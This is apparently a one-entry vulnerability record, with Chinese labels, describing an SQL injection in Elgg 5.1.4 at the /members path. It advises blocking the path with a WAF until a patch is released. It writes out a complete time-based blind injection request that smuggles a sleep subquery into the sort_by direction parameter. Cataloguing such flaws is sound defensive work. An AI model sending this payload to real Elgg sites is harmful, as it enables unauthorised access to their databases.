vendor = "Elgg"
name = "Elgg 5.1.4 Sql注入"
type = "SQL注入"
version = "5.1.4"
path = "/members"
detail = "GET /members?sort_by%5Bproperty%5D=name&sort_by%5Bproperty_type%5D=metadata&sort_by%5Bdirection%5D=desc%2c(select*from(select(sleep(6)))a) HTTP/1.1 Host:"
fix = "WAF封禁路路径，等待发布补丁"
date = "0823"
label = "nday"
